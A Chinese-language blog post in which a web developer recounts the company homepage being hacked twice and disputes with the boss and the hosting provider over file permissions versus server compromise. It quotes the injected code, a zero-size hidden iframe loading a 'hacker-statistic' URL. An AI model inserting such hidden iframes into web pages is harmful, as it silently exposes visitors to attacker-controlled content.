上个月底网站的主页被黑客添加类似这样的代码

< body >< iframe src=”http://hacker-statistic/……” width=”0” height=”0” frameborder=”0” > < / iframe >
以至于被Google的安全浏览功能屏蔽，用Firefox网站无法访问。

从文件权限666来看，文件可以被写入，好像是权限设置问题。但是我尝试把权限改为600，文件仍然被修改。从这里我们可以判断：是服务器的安全有问题，可以猜测是黑客在服务器上拥有写的权限。这说明什么，当然是虚拟主机提供商太劣质。但是…

老板发现后，我说明我的看法，但是老板自己认为：网页权限是666，就是是任何人都可以修改，通过网页也可以被修改。加上咨询虚拟主机提供商的意见（他们的意见和老板一致，是文件权限666造成网页被修改，而且还很善意的帮我们修改FTP密码，并提供一些安全建议，做的很全套，很有说服力），老板强烈建议我重新审视现用系统的安全性，特别注意不要设置666，不要把密码随便记录在文件中。我中肯的点点头。

作为做技术的我，我的确在权限设置上不够严谨，但是666并不是我愿意设置的，而是根据系统需要和虚拟主机上可以写文件的条件造成，要不我完全可以设置权限为660，甚至600。

我知道的原因在老板看来不是问题，或者说是不能明白。于是老板接受了虚拟主机提供商的意见。我也再次加强系统的安全防范。就这样事情慢慢被淡忘…

半个月后的今天，网站主页再次被修改。老板是乎这才明白过来，问题出在服务器上，在劣质虚拟主机提供商的身上。也许我这才可以松口气，也许我会继续郁闷与老板在技术问题的沟通上，也许我会继续争扎在是老板和劣质虚拟主机提供商的怪圈中…

后续更新2009-09-16：
老板再次提出质疑：说我的电脑是否有装防病毒软件，最好用杀毒软件杀杀毒。
真是郁闷，如果我的电脑有病毒，为什么只是那个网站有问题，而别的网站没事，那这个黑客真是好心，只黑我们一个网站的主页而已。